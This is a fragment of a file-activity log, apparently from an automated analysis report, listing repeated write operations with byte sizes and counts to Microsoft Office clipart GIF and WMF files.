| Write | C:\Program Files\Microsoft Office\CLIPART\PUB60COR\AG00052_.GIF | size = 1 |
|
2 | |
| Write | C:\Program Files\Microsoft Office\CLIPART\PUB60COR\AG00052_.GIF | size = 7717 |
|
1 | |
| Write | C:\Program Files\Microsoft Office\CLIPART\PUB60COR\AG00052_.GIF | size = 4 |
|
3 | |
| Write | C:\Program Files\Microsoft Office\CLIPART\PUB60COR\AG00052_.GIF | size = 188 |
|
1 | |
| Write | C:\Program Files\Microsoft Office\CLIPART\PUB60COR\AG00052_.GIF | size = 1268 |
|
1 | |
| Write | C:\Program Files\Microsoft Office\CLIPART\PUB60COR\AG00057_.GIF | size = 1 |
|
2 | |
| Write | C:\Program Files\Microsoft Office\CLIPART\PUB60COR\AG00057_.GIF | size = 11925 |
|
1 | |
| Write | C:\Program Files\Microsoft Office\CLIPART\PUB60COR\AG00057_.GIF | size = 4 |
|
3 | |
| Write | C:\Program Files\Microsoft Office\CLIPART\PUB60COR\AG00057_.GIF | size = 188 |
|
1 | |
| Write | C:\Program Files\Microsoft Office\CLIPART\PUB60COR\AG00057_.GIF | size = 1268 |
|
1 | |
| Write | C:\Program Files\Microsoft Office\CLIPART\PUB60COR\AG00090_.GIF | size = 1 |
|
2 | |
| Write | C:\Program Files\Microsoft Office\CLIPART\PUB60COR\AG00090_.GIF | size = 549 |
|
1 | |
| Write | C:\Program Files\Microsoft Office\CLIPART\PUB60COR\AG00090_.GIF | size = 4 |
|
3 | |
| Write | C:\Program Files\Microsoft Office\CLIPART\PUB60COR\AG00090_.GIF | size = 188 |
|
1 | |
| Write | C:\Program Files\Microsoft Office\CLIPART\PUB60COR\AG00090_.GIF | size = 1268 |
|
1 | |
| Write | C:\Program Files\Microsoft Office\CLIPART\PUB60COR\AG00092_.GIF | size = 1 |
|
2 | |
| Write | C:\Program Files\Microsoft Office\CLIPART\PUB60COR\AG00092_.GIF | size = 533 |
|
1 | |
| Write | C:\Program Files\Microsoft Office\CLIPART\PUB60COR\AG00092_.GIF | size = 4 |
|
3 | |
| Write | C:\Program Files\Microsoft Office\CLIPART\PUB60COR\AG00092_.GIF | size = 188 |
|
1 | |
| Write | C:\Program Files\Microsoft Office\CLIPART\PUB60COR\AG00092_.GIF | size = 1268 |
|
1 | |
| Write | C:\Program Files\Microsoft Office\CLIPART\PUB60COR\AG00103_.GIF | size = 1 |
|
2 | |
| Write | C:\Program Files\Microsoft Office\CLIPART\PUB60COR\AG00103_.GIF | size = 12741 |
|
1 | |
| Write | C:\Program Files\Microsoft Office\CLIPART\PUB60COR\AG00103_.GIF | size = 4 |
|
3 | |
| Write | C:\Program Files\Microsoft Office\CLIPART\PUB60COR\AG00103_.GIF | size = 188 |
|
1 | |
| Write | C:\Program Files\Microsoft Office\CLIPART\PUB60COR\AG00103_.GIF | size = 1268 |
|
1 | |
| Write | C:\Program Files\Microsoft Office\CLIPART\PUB60COR\AG00120_.GIF | size = 1 |
|
2 | |
| Write | C:\Program Files\Microsoft Office\CLIPART\PUB60COR\AG00120_.GIF | size = 3509 |
|
1 | |
| Write | C:\Program Files\Microsoft Office\CLIPART\PUB60COR\AG00120_.GIF | size = 4 |
|
3 | |
| Write | C:\Program Files\Microsoft Office\CLIPART\PUB60COR\AG00120_.GIF | size = 188 |
|
1 | |
| Write | C:\Program Files\Microsoft Office\CLIPART\PUB60COR\AG00120_.GIF | size = 1268 |
|
1 | |
| Write | C:\Program Files\Microsoft Office\CLIPART\PUB60COR\AG00126_.GIF | size = 1 |
|
2 | |
| Write | C:\Program Files\Microsoft Office\CLIPART\PUB60COR\AG00126_.GIF | size = 3173 |
|
1 | |
| Write | C:\Program Files\Microsoft Office\CLIPART\PUB60COR\AG00126_.GIF | size = 4 |
|
3 | |
| Write | C:\Program Files\Microsoft Office\CLIPART\PUB60COR\AG00126_.GIF | size = 188 |
|
1 | |
| Write | C:\Program Files\Microsoft Office\CLIPART\PUB60COR\AG00126_.GIF | size = 1268 |
|
1 | |
| Write | C:\Program Files\Microsoft Office\CLIPART\PUB60COR\AG00129_.GIF | size = 1 |
|
2 | |
| Write | C:\Program Files\Microsoft Office\CLIPART\PUB60COR\AG00129_.GIF | size = 12517 |
|
1 | |
| Write | C:\Program Files\Microsoft Office\CLIPART\PUB60COR\AG00129_.GIF | size = 4 |
|
3 | |
| Write | C:\Program Files\Microsoft Office\CLIPART\PUB60COR\AG00129_.GIF | size = 188 |
|
1 | |
| Write | C:\Program Files\Microsoft Office\CLIPART\PUB60COR\AG00129_.GIF | size = 1268 |
|
1 | |
| Write | C:\Program Files\Microsoft Office\CLIPART\PUB60COR\AG00130_.GIF | size = 1 |
|
2 | |
| Write | C:\Program Files\Microsoft Office\CLIPART\PUB60COR\AG00130_.GIF | size = 5285 |
|
1 | |
| Write | C:\Program Files\Microsoft Office\CLIPART\PUB60COR\AG00130_.GIF | size = 4 |
|
3 | |
| Write | C:\Program Files\Microsoft Office\CLIPART\PUB60COR\AG00130_.GIF | size = 188 |
|
1 | |
| Write | C:\Program Files\Microsoft Office\CLIPART\PUB60COR\AG00130_.GIF | size = 1268 |
|
1 | |
| Write | C:\Program Files\Microsoft Office\CLIPART\PUB60COR\AG00135_.GIF | size = 1 |
|
2 | |
| Write | C:\Program Files\Microsoft Office\CLIPART\PUB60COR\AG00135_.GIF | size = 2629 |
|
1 | |
| Write | C:\Program Files\Microsoft Office\CLIPART\PUB60COR\AG00135_.GIF | size = 4 |
|
3 | |
| Write | C:\Program Files\Microsoft Office\CLIPART\PUB60COR\AG00135_.GIF | size = 188 |
|
1 | |
| Write | C:\Program Files\Microsoft Office\CLIPART\PUB60COR\AG00135_.GIF | size = 1268 |
|
1 | |
| Write | C:\Program Files\Microsoft Office\CLIPART\PUB60COR\AG00139_.GIF | size = 1 |
|
2 | |
| Write | C:\Program Files\Microsoft Office\CLIPART\PUB60COR\AG00139_.GIF | size = 10645 |
|
1 | |
| Write | C:\Program Files\Microsoft Office\CLIPART\PUB60COR\AG00139_.GIF | size = 4 |
|
3 | |
| Write | C:\Program Files\Microsoft Office\CLIPART\PUB60COR\AG00139_.GIF | size = 188 |
|
1 | |
| Write | C:\Program Files\Microsoft Office\CLIPART\PUB60COR\AG00139_.GIF | size = 1268 |
|
1 | |
| Write | C:\Program Files\Microsoft Office\CLIPART\PUB60COR\AG00142_.GIF | size = 1 |
|
2 | |
| Write | C:\Program Files\Microsoft Office\CLIPART\PUB60COR\AG00142_.GIF | size = 15333 |
|
1 | |
| Write | C:\Program Files\Microsoft Office\CLIPART\PUB60COR\AG00142_.GIF | size = 4 |
|
3 | |
| Write | C:\Program Files\Microsoft Office\CLIPART\PUB60COR\AG00142_.GIF | size = 188 |
|
1 | |
| Write | C:\Program Files\Microsoft Office\CLIPART\PUB60COR\AG00142_.GIF | size = 1268 |
|
1 | |
| Write | C:\Program Files\Microsoft Office\CLIPART\PUB60COR\AG00154_.GIF | size = 1 |
|
2 | |
| Write | C:\Program Files\Microsoft Office\CLIPART\PUB60COR\AG00154_.GIF | size = 5349 |
|
1 | |
| Write | C:\Program Files\Microsoft Office\CLIPART\PUB60COR\AG00154_.GIF | size = 4 |
|
3 | |
| Write | C:\Program Files\Microsoft Office\CLIPART\PUB60COR\AG00154_.GIF | size = 188 |
|
1 | |
| Write | C:\Program Files\Microsoft Office\CLIPART\PUB60COR\AG00154_.GIF | size = 1268 |
|
1 | |
| Write | C:\Program Files\Microsoft Office\CLIPART\PUB60COR\AG00157_.GIF | size = 1 |
|
2 | |
| Write | C:\Program Files\Microsoft Office\CLIPART\PUB60COR\AG00157_.GIF | size = 4981 |
|
1 | |
| Write | C:\Program Files\Microsoft Office\CLIPART\PUB60COR\AG00157_.GIF | size = 4 |
|
3 | |
| Write | C:\Program Files\Microsoft Office\CLIPART\PUB60COR\AG00157_.GIF | size = 188 |
|
1 | |
| Write | C:\Program Files\Microsoft Office\CLIPART\PUB60COR\AG00157_.GIF | size = 1268 |
|
1 | |
| Write | C:\Program Files\Microsoft Office\CLIPART\PUB60COR\AG00158_.GIF | size = 1 |
|
2 | |
| Write | C:\Program Files\Microsoft Office\CLIPART\PUB60COR\AG00158_.GIF | size = 5061 |
|
1 | |
| Write | C:\Program Files\Microsoft Office\CLIPART\PUB60COR\AG00158_.GIF | size = 4 |
|
3 | |
| Write | C:\Program Files\Microsoft Office\CLIPART\PUB60COR\AG00158_.GIF | size = 188 |
|
1 | |
| Write | C:\Program Files\Microsoft Office\CLIPART\PUB60COR\AG00158_.GIF | size = 1268 |
|
1 | |
| Write | C:\Program Files\Microsoft Office\CLIPART\PUB60COR\AG00160_.GIF | size = 1 |
|
2 | |
| Write | C:\Program Files\Microsoft Office\CLIPART\PUB60COR\AG00160_.GIF | size = 1173 |
|
1 | |
| Write | C:\Program Files\Microsoft Office\CLIPART\PUB60COR\AG00160_.GIF | size = 4 |
|
3 | |
| Write | C:\Program Files\Microsoft Office\CLIPART\PUB60COR\AG00160_.GIF | size = 188 |
|
1 | |
| Write | C:\Program Files\Microsoft Office\CLIPART\PUB60COR\AG00160_.GIF | size = 1268 |
|
1 | |
| Write | C:\Program Files\Microsoft Office\CLIPART\PUB60COR\AG00161_.GIF | size = 1 |
|
2 | |
| Write | C:\Program Files\Microsoft Office\CLIPART\PUB60COR\AG00161_.GIF | size = 7621 |
|
1 | |
| Write | C:\Program Files\Microsoft Office\CLIPART\PUB60COR\AG00161_.GIF | size = 4 |
|
3 | |
| Write | C:\Program Files\Microsoft Office\CLIPART\PUB60COR\AG00161_.GIF | size = 188 |
|
1 | |
| Write | C:\Program Files\Microsoft Office\CLIPART\PUB60COR\AG00161_.GIF | size = 1268 |
|
1 | |
| Write | C:\Program Files\Microsoft Office\CLIPART\PUB60COR\AG00163_.GIF | size = 1 |
|
2 | |
| Write | C:\Program Files\Microsoft Office\CLIPART\PUB60COR\AG00163_.GIF | size = 7013 |
|
1 | |
| Write | C:\Program Files\Microsoft Office\CLIPART\PUB60COR\AG00163_.GIF | size = 4 |
|
3 | |
| Write | C:\Program Files\Microsoft Office\CLIPART\PUB60COR\AG00163_.GIF | size = 188 |
|
1 | |
| Write | C:\Program Files\Microsoft Office\CLIPART\PUB60COR\AG00163_.GIF | size = 1268 |
|
1 | |
| Write | C:\Program Files\Microsoft Office\CLIPART\PUB60COR\AG00164_.GIF | size = 1 |
|
2 | |
| Write | C:\Program Files\Microsoft Office\CLIPART\PUB60COR\AG00164_.GIF | size = 13285 |
|
1 | |
| Write | C:\Program Files\Microsoft Office\CLIPART\PUB60COR\AG00164_.GIF | size = 4 |
|
3 | |
| Write | C:\Program Files\Microsoft Office\CLIPART\PUB60COR\AG00164_.GIF | size = 188 |
|
1 | |
| Write | C:\Program Files\Microsoft Office\CLIPART\PUB60COR\AG00164_.GIF | size = 1268 |
|
1 | |
| Write | C:\Program Files\Microsoft Office\CLIPART\PUB60COR\AG00165_.GIF | size = 1 |
|
2 | |
| Write | C:\Program Files\Microsoft Office\CLIPART\PUB60COR\AG00165_.GIF | size = 8613 |
|
1 | |
| Write | C:\Program Files\Microsoft Office\CLIPART\PUB60COR\AG00165_.GIF | size = 4 |
|
3 | |
| Write | C:\Program Files\Microsoft Office\CLIPART\PUB60COR\AG00165_.GIF | size = 188 |
|
1 | |
| Write | C:\Program Files\Microsoft Office\CLIPART\PUB60COR\AG00165_.GIF | size = 1268 |
|
1 | |
| Write | C:\Program Files\Microsoft Office\CLIPART\PUB60COR\AG00167_.GIF | size = 1 |
|
2 | |
| Write | C:\Program Files\Microsoft Office\CLIPART\PUB60COR\AG00167_.GIF | size = 4933 |
|
1 | |
| Write | C:\Program Files\Microsoft Office\CLIPART\PUB60COR\AG00167_.GIF | size = 4 |
|
3 | |
| Write | C:\Program Files\Microsoft Office\CLIPART\PUB60COR\AG00167_.GIF | size = 188 |
|
1 | |
| Write | C:\Program Files\Microsoft Office\CLIPART\PUB60COR\AG00167_.GIF | size = 1268 |
|
1 | |
| Write | C:\Program Files\Microsoft Office\CLIPART\PUB60COR\AG00169_.GIF | size = 1 |
|
2 | |
| Write | C:\Program Files\Microsoft Office\CLIPART\PUB60COR\AG00169_.GIF | size = 5413 |
|
1 | |
| Write | C:\Program Files\Microsoft Office\CLIPART\PUB60COR\AG00169_.GIF | size = 4 |
|
3 | |
| Write | C:\Program Files\Microsoft Office\CLIPART\PUB60COR\AG00169_.GIF | size = 188 |
|
1 | |
| Write | C:\Program Files\Microsoft Office\CLIPART\PUB60COR\AG00169_.GIF | size = 1268 |
|
1 | |
| Write | C:\Program Files\Microsoft Office\CLIPART\PUB60COR\AG00170_.GIF | size = 1 |
|
2 | |
| Write | C:\Program Files\Microsoft Office\CLIPART\PUB60COR\AG00170_.GIF | size = 9285 |
|
1 | |
| Write | C:\Program Files\Microsoft Office\CLIPART\PUB60COR\AG00170_.GIF | size = 4 |
|
3 | |
| Write | C:\Program Files\Microsoft Office\CLIPART\PUB60COR\AG00170_.GIF | size = 188 |
|
1 | |
| Write | C:\Program Files\Microsoft Office\CLIPART\PUB60COR\AG00170_.GIF | size = 1268 |
|
1 | |
| Write | C:\Program Files\Microsoft Office\CLIPART\PUB60COR\AG00171_.GIF | size = 1 |
|
2 | |
| Write | C:\Program Files\Microsoft Office\CLIPART\PUB60COR\AG00171_.GIF | size = 5045 |
|
1 | |
| Write | C:\Program Files\Microsoft Office\CLIPART\PUB60COR\AG00171_.GIF | size = 4 |
|
3 | |
| Write | C:\Program Files\Microsoft Office\CLIPART\PUB60COR\AG00171_.GIF | size = 188 |
|
1 | |
| Write | C:\Program Files\Microsoft Office\CLIPART\PUB60COR\AG00171_.GIF | size = 1268 |
|
1 | |
| Write | C:\Program Files\Microsoft Office\CLIPART\PUB60COR\AG00172_.GIF | size = 1 |
|
2 | |
| Write | C:\Program Files\Microsoft Office\CLIPART\PUB60COR\AG00172_.GIF | size = 4421 |
|
1 | |
| Write | C:\Program Files\Microsoft Office\CLIPART\PUB60COR\AG00172_.GIF | size = 4 |
|
3 | |
| Write | C:\Program Files\Microsoft Office\CLIPART\PUB60COR\AG00172_.GIF | size = 188 |
|
1 | |
| Write | C:\Program Files\Microsoft Office\CLIPART\PUB60COR\AG00172_.GIF | size = 1268 |
|
1 | |
| Write | C:\Program Files\Microsoft Office\CLIPART\PUB60COR\AG00174_.GIF | size = 1 |
|
2 | |
| Write | C:\Program Files\Microsoft Office\CLIPART\PUB60COR\AG00174_.GIF | size = 4005 |
|
1 | |
| Write | C:\Program Files\Microsoft Office\CLIPART\PUB60COR\AG00174_.GIF | size = 4 |
|
3 | |
| Write | C:\Program Files\Microsoft Office\CLIPART\PUB60COR\AG00174_.GIF | size = 188 |
|
1 | |
| Write | C:\Program Files\Microsoft Office\CLIPART\PUB60COR\AG00174_.GIF | size = 1268 |
|
1 | |
| Write | C:\Program Files\Microsoft Office\CLIPART\PUB60COR\AG00175_.GIF | size = 1 |
|
2 | |
| Write | C:\Program Files\Microsoft Office\CLIPART\PUB60COR\AG00175_.GIF | size = 3413 |
|
1 | |
| Write | C:\Program Files\Microsoft Office\CLIPART\PUB60COR\AG00175_.GIF | size = 4 |
|
3 | |
| Write | C:\Program Files\Microsoft Office\CLIPART\PUB60COR\AG00175_.GIF | size = 188 |
|
1 | |
| Write | C:\Program Files\Microsoft Office\CLIPART\PUB60COR\AG00175_.GIF | size = 1268 |
|
1 | |
| Write | C:\Program Files\Microsoft Office\CLIPART\PUB60COR\AG00176_.GIF | size = 1 |
|
2 | |
| Write | C:\Program Files\Microsoft Office\CLIPART\PUB60COR\AG00176_.GIF | size = 3157 |
|
1 | |
| Write | C:\Program Files\Microsoft Office\CLIPART\PUB60COR\AG00176_.GIF | size = 4 |
|
3 | |
| Write | C:\Program Files\Microsoft Office\CLIPART\PUB60COR\AG00176_.GIF | size = 188 |
|
1 | |
| Write | C:\Program Files\Microsoft Office\CLIPART\PUB60COR\AG00176_.GIF | size = 1268 |
|
1 | |
| Write | C:\Program Files\Microsoft Office\CLIPART\PUB60COR\AN00010_.WMF | size = 1 |
|
2 | |
| Write | C:\Program Files\Microsoft Office\CLIPART\PUB60COR\AN00010_.WMF | size = 3061 |
|
1 | |
| Write | C:\Program Files\Microsoft Office\CLIPART\PUB60COR\AN00010_.WMF | size = 4 |
|
3 | |
| Write | C:\Program Files\Microsoft Office\CLIPART\PUB60COR\AN00010_.WMF | size = 188 |
|
1 | |
| Write | C:\Program Files\Microsoft Office\CLIPART\PUB60COR\AN00010_.WMF | size = 1268 |
|
1 | |
| Write | C:\Program Files\Microsoft Office\CLIPART\PUB60COR\AN00015_.WMF | size = 1 |
|
2 | |
| Write | C:\Program Files\Microsoft Office\CLIPART\PUB60COR\AN00015_.WMF | size = 4773 |
|
1 | |
| Write | C:\Program Files\Microsoft Office\CLIPART\PUB60COR\AN00015_.WMF | size = 4 |
|
3 | |
| Write | C:\Program Files\Microsoft Office\CLIPART\PUB60COR\AN00015_.WMF | size = 188 |
|
1 | |
| Write | C:\Program Files\Microsoft Office\CLIPART\PUB60COR\AN00015_.WMF | size = 1268 |
|
1 | |
| Write | C:\Program Files\Microsoft Office\CLIPART\PUB60COR\AN00790_.WMF | size = 1 |
|
2 | |
| Write | C:\Program Files\Microsoft Office\CLIPART\PUB60COR\AN00790_.WMF | size = 5717 |
|
1 | |
| Write | C:\Program Files\Microsoft Office\CLIPART\PUB60COR\AN00790_.WMF | size = 4 |
|
3 | |
| Write | C:\Program Files\Microsoft Office\CLIPART\PUB60COR\AN00790_.WMF | size = 188 |
|
1 | |
| Write | C:\Program Files\Microsoft Office\CLIPART\PUB60COR\AN00790_.WMF | size = 1268 |
|
1 | |
| Write | C:\Program Files\Microsoft Office\CLIPART\PUB60COR\AN00853_.WMF | size = 1 |
|
2 | |
| Write | C:\Program Files\Microsoft Office\CLIPART\PUB60COR\AN00853_.WMF | size = 20613 |
|
1 | |
| Write | C:\Program Files\Microsoft Office\CLIPART\PUB60COR\AN00853_.WMF | size = 4 |
|
3 | |
| Write | C:\Program Files\Microsoft Office\CLIPART\PUB60COR\AN00853_.WMF | size = 188 |
|
1 | |
| Write | C:\Program Files\Microsoft Office\CLIPART\PUB60COR\AN00853_.WMF | size = 1268 |
|
1 | |
| Write | C:\Program Files\Microsoft Office\CLIPART\PUB60COR\AN00914_.WMF | size = 1 |
|
2 | |
| Write | C:\Program Files\Microsoft Office\CLIPART\PUB60COR\AN00914_.WMF | size = 10869 |
|
1 | |
| Write | C:\Program Files\Microsoft Office\CLIPART\PUB60COR\AN00914_.WMF | size = 4 |
|
3 | |
| Write | C:\Program Files\Microsoft Office\CLIPART\PUB60COR\AN00914_.WMF | size = 188 |
|
1 | |
| Write | C:\Program Files\Microsoft Office\CLIPART\PUB60COR\AN00914_.WMF | size = 1268 |
|
1 | |
| Write | C:\Program Files\Microsoft Office\CLIPART\PUB60COR\AN00932_.WMF | size = 1 |
|
2 | |
| Write | C:\Program Files\Microsoft Office\CLIPART\PUB60COR\AN00932_.WMF | size = 14453 |
|
1 | |
| Write | C:\Program Files\Microsoft Office\CLIPART\PUB60COR\AN00932_.WMF | size = 4 |
|
3 | |
| Write | C:\Program Files\Microsoft Office\CLIPART\PUB60COR\AN00932_.WMF | size = 188 |
|
1 | |
| Write | C:\Program Files\Microsoft Office\CLIPART\PUB60COR\AN00932_.WMF | size = 1268 |
|
1 | |
| Write | C:\Program Files\Microsoft Office\CLIPART\PUB60COR\AN00965_.WMF | size = 1 |
|
2 | |
| Write | C:\Program Files\Microsoft Office\CLIPART\PUB60COR\AN00965_.WMF | size = 7109 |
|
1 | |
| Write | C:\Program Files\Microsoft Office\CLIPART\PUB60COR\AN00965_.WMF | size = 4 |
|
3 | |
| Write | C:\Program Files\Microsoft Office\CLIPART\PUB60COR\AN00965_.WMF | size = 188 |
|
1 | |
| Write | C:\Program Files\Microsoft Office\CLIPART\PUB60COR\AN00965_.WMF | size = 1268 |
|
1 | |
| Write | C:\Program Files\Microsoft Office\CLIPART\PUB60COR\AN01039_.WMF | size = 1 |
|
2 | |
| Write | C:\Program Files\Microsoft Office\CLIPART\PUB60COR\AN01039_.WMF | size = 3381 |
|
1 | |
| Write | C:\Program Files\Microsoft Office\CLIPART\PUB60COR\AN01039_.WMF | size = 4 |
|
3 | |
| Write | C:\Program Files\Microsoft Office\CLIPART\PUB60COR\AN01039_.WMF | size = 188 |
|
1 | |
| Write | C:\Program Files\Microsoft Office\CLIPART\PUB60COR\AN01039_.WMF | size = 1268 |
|
1 | |
| Write | C:\Program Files\Microsoft Office\CLIPART\PUB60COR\AN01044_.WMF | size = 1 |
|
2 | |
| Write | C:\Program Files\Microsoft Office\CLIPART\PUB60COR\AN01044_.WMF | size = 1621 |
|
1 | |
| Write | C:\Program Files\Microsoft Office\CLIPART\PUB60COR\AN01044_.WMF | size = 4 |
|
3 | |
| Write | C:\Program Files\Microsoft Office\CLIPART\PUB60COR\AN01044_.WMF | size = 188 |
|
1 | |
| Write | C:\Program Files\Microsoft Office\CLIPART\PUB60COR\AN01044_.WMF | size = 1268 |
|
1 | |
| Write | C:\Program Files\Microsoft Office\CLIPART\PUB60COR\AN01060_.WMF | size = 1 |
|
2 | |
| Write | C:\Program Files\Microsoft Office\CLIPART\PUB60COR\AN01060_.WMF | size = 8005 |
|
1 | |
| Write | C:\Program Files\Microsoft Office\CLIPART\PUB60COR\AN01060_.WMF | size = 4 |
|
3 | |
| Write | C:\Program Files\Microsoft Office\CLIPART\PUB60COR\AN01060_.WMF | size = 188 |
|
1 | |
| Write | C:\Program Files\Microsoft Office\CLIPART\PUB60COR\AN01060_.WMF | size = 1268 |
|
1 | |
| Write | C:\Program Files\Microsoft Office\CLIPART\PUB60COR\AN01084_.WMF | size = 1 |
|
2 | |
| Write | C:\Program Files\Microsoft Office\CLIPART\PUB60COR\AN01084_.WMF | size = 1861 |
|
1 | |
| Write | C:\Program Files\Microsoft Office\CLIPART\PUB60COR\AN01084_.WMF | size = 4 |
|
3 | |
| Write | C:\Program Files\Microsoft Office\CLIPART\PUB60COR\AN01084_.WMF | size = 188 |
|
1 | |
| Write | C:\Program Files\Microsoft Office\CLIPART\PUB60COR\AN01084_.WMF | size = 1268 |
|
1 | |
| Write | C:\Program Files\Microsoft Office\CLIPART\PUB60COR\AN01173_.WMF | size = 1 |
|
2 | |
| Write | C:\Program Files\Microsoft Office\CLIPART\PUB60COR\AN01173_.WMF | size = 26357 |
|
1 | |
| Write | C:\Program Files\Microsoft Office\CLIPART\PUB60COR\AN01173_.WMF | size = 4 |
|
3 | |
| Write | C:\Program Files\Microsoft Office\CLIPART\PUB60COR\AN01173_.WMF | size = 188 |
|
1 | |
| Write | C:\Program Files\Microsoft Office\CLIPART\PUB60COR\AN01173_.WMF | size = 1268 |
|
1 | |
| Write | C:\Program Files\Microsoft Office\CLIPART\PUB60COR\AN01174_.WMF | size = 1 |
|
2 | |
| Write | C:\Program Files\Microsoft Office\CLIPART\PUB60COR\AN01174_.WMF | size = 27893 |
|
1 | |
| Write | C:\Program Files\Microsoft Office\CLIPART\PUB60COR\AN01174_.WMF | size = 4 |
|
3 | |
| Write | C:\Program Files\Microsoft Office\CLIPART\PUB60COR\AN01174_.WMF | size = 188 |
|
1 | |
| Write | C:\Program Files\Microsoft Office\CLIPART\PUB60COR\AN01174_.WMF | size = 1268 |
|
1 | |
| Write | C:\Program Files\Microsoft Office\CLIPART\PUB60COR\AN01184_.WMF | size = 1 |
|
2 | |
| Write | C:\Program Files\Microsoft Office\CLIPART\PUB60COR\AN01184_.WMF | size = 3781 |
|
1 | |
| Write | C:\Program Files\Microsoft Office\CLIPART\PUB60COR\AN01184_.WMF | size = 4 |
|
3 | |
| Write | C:\Program Files\Microsoft Office\CLIPART\PUB60COR\AN01184_.WMF | size = 188 |
|
1 | |
| Write | C:\Program Files\Microsoft Office\CLIPART\PUB60COR\AN01184_.WMF | size = 1268 |
|
1 | |
| Write | C:\Program Files\Microsoft Office\CLIPART\PUB60COR\AN01216_.WMF | size = 1 |
|
2 | |
| Write | C:\Program Files\Microsoft Office\CLIPART\PUB60COR\AN01216_.WMF | size = 5861 |
|
1 | |
| Write | C:\Program Files\Microsoft Office\CLIPART\PUB60COR\AN01216_.WMF | size = 4 |
|
3 | |
| Write | C:\Program Files\Microsoft Office\CLIPART\PUB60COR\AN01216_.WMF | size = 188 |
|
1 | |
| Write | C:\Program Files\Microsoft Office\CLIPART\PUB60COR\AN01216_.WMF | size = 1268 |
|
1 | |
| Write | C:\Program Files\Microsoft Office\CLIPART\PUB60COR\AN01218_.WMF | size = 1 |
|
2 | |
| Write | C:\Program Files\Microsoft Office\CLIPART\PUB60COR\AN01218_.WMF | size = 3045 |
|
1 | |
| Write | C:\Program Files\Microsoft Office\CLIPART\PUB60COR\AN01218_.WMF | size = 4 |
|
3 | |
| Write | C:\Program Files\Microsoft Office\CLIPART\PUB60COR\AN01218_.WMF | size = 188 |
|
1 | |
| Write | C:\Program Files\Microsoft Office\CLIPART\PUB60COR\AN01218_.WMF | size = 1268 |
|
1 | |
| Write | C:\Program Files\Microsoft Office\CLIPART\PUB60COR\AN01251_.WMF | size = 1 |
|
2 | |
| Write | C:\Program Files\Microsoft Office\CLIPART\PUB60COR\AN01251_.WMF | size = 2789 |
|
1 | |
| Write | C:\Program Files\Microsoft Office\CLIPART\PUB60COR\AN01251_.WMF | size = 4 |
|
3 | |
| Write | C:\Program Files\Microsoft Office\CLIPART\PUB60COR\AN01251_.WMF | size = 188 |
|
1 | |
| Write | C:\Program Files\Microsoft Office\CLIPART\PUB60COR\AN01251_.WMF | size = 1268 |
|
1 | |
| Write | C:\Program Files\Microsoft Office\CLIPART\PUB60COR\AN01545_.WMF | size = 1 |
|
2 | |
| Write | C:\Program Files\Microsoft Office\CLIPART\PUB60COR\AN01545_.WMF | size = 7397 |
|
1 | |
| Write | C:\Program Files\Microsoft Office\CLIPART\PUB60COR\AN01545_.WMF | size = 4 |
|
3 | |
| Write | C:\Program Files\Microsoft Office\CLIPART\PUB60COR\AN01545_.WMF | size = 188 |
|
1 | |
| Write | C:\Program Files\Microsoft Office\CLIPART\PUB60COR\AN01545_.WMF | size = 1268 |
|
1 | |
| Write | C:\Program Files\Microsoft Office\CLIPART\PUB60COR\AN02122_.WMF | size = 1 |
|
2 | |
| Write | C:\Program Files\Microsoft Office\CLIPART\PUB60COR\AN02122_.WMF | size = 7573 |
|
1 | |
| Write | C:\Program Files\Microsoft Office\CLIPART\PUB60COR\AN02122_.WMF | size = 4 |
|
3 | |
| Write | C:\Program Files\Microsoft Office\CLIPART\PUB60COR\AN02122_.WMF | size = 188 |
|
1 | |
| Write | C:\Program Files\Microsoft Office\CLIPART\PUB60COR\AN02122_.WMF | size = 1268 |
|
1 | |
| Write | C:\Program Files\Microsoft Office\CLIPART\PUB60COR\AN02559_.WMF | size = 1 |
|
2 | |
| Write | C:\Program Files\Microsoft Office\CLIPART\PUB60COR\AN02559_.WMF | size = 6661 |
|
1 | |
| Write | C:\Program Files\Microsoft Office\CLIPART\PUB60COR\AN02559_.WMF | size = 4 |
|
3 | |
| Write | C:\Program Files\Microsoft Office\CLIPART\PUB60COR\AN02559_.WMF | size = 188 |
|
1 | |
| Write | C:\Program Files\Microsoft Office\CLIPART\PUB60COR\AN02559_.WMF | size = 1268 |
|
1 | |
| Write | C:\Program Files\Microsoft Office\CLIPART\PUB60COR\AN02724_.WMF | size = 1 |
|
2 | |
| Write | C:\Program Files\Microsoft Office\CLIPART\PUB60COR\AN02724_.WMF | size = 2133 |
|
1 | |
| Write | C:\Program Files\Microsoft Office\CLIPART\PUB60COR\AN02724_.WMF | size = 4 |
|
3 | |
| Write | C:\Program Files\Microsoft Office\CLIPART\PUB60COR\AN02724_.WMF | size = 188 |
|
1 | |
| Write | C:\Program Files\Microsoft Office\CLIPART\PUB60COR\AN02724_.WMF | size = 1268 |
|
1 | |
| Write | C:\Program Files\Microsoft Office\CLIPART\PUB60COR\AN03500_.WMF | size = 1 |
|
2 | |
| Write | C:\Program Files\Microsoft Office\CLIPART\PUB60COR\AN03500_.WMF | size = 9269 |
|
1 | |
| Write | C:\Program Files\Microsoft Office\CLIPART\PUB60COR\AN03500_.WMF | size = 4 |
|
3 | |
| Write | C:\Program Files\Microsoft Office\CLIPART\PUB60COR\AN03500_.WMF | size = 188 |
|
1 | |
| Write | C:\Program Files\Microsoft Office\CLIPART\PUB60COR\AN03500_.WMF | size = 1268 |
|
1 | |
| Write | C:\Program Files\Microsoft Office\CLIPART\PUB60COR\AN04108_.WMF | size = 1 |
|
2 | |
| Write | C:\Program Files\Microsoft Office\CLIPART\PUB60COR\AN04108_.WMF | size = 2373 |
|
1 | |
| Write | C:\Program Files\Microsoft Office\CLIPART\PUB60COR\AN04108_.WMF | size = 4 |
|
3 | |
| Write | C:\Program Files\Microsoft Office\CLIPART\PUB60COR\AN04108_.WMF | size = 188 |
|
1 | |
| Write | C:\Program Files\Microsoft Office\CLIPART\PUB60COR\AN04108_.WMF | size = 1268 |
|
1 | |
| Write | C:\Program Files\Microsoft Office\CLIPART\PUB60COR\AN04117_.WMF | size = 1 |
|
2 | |
| Write | C:\Program Files\Microsoft Office\CLIPART\PUB60COR\AN04117_.WMF | size = 6085 |
|
1 | |
| Write | C:\Program Files\Microsoft Office\CLIPART\PUB60COR\AN04117_.WMF | size = 4 |
|
3 | |
| Write | C:\Program Files\Microsoft Office\CLIPART\PUB60COR\AN04117_.WMF | size = 188 |
|
1 | |
| Write | C:\Program Files\Microsoft Office\CLIPART\PUB60COR\AN04117_.WMF | size = 1268 |
|
1 | |
| Write | C:\Program Files\Microsoft Office\CLIPART\PUB60COR\AN04134_.WMF | size = 1 |
|
2 | |
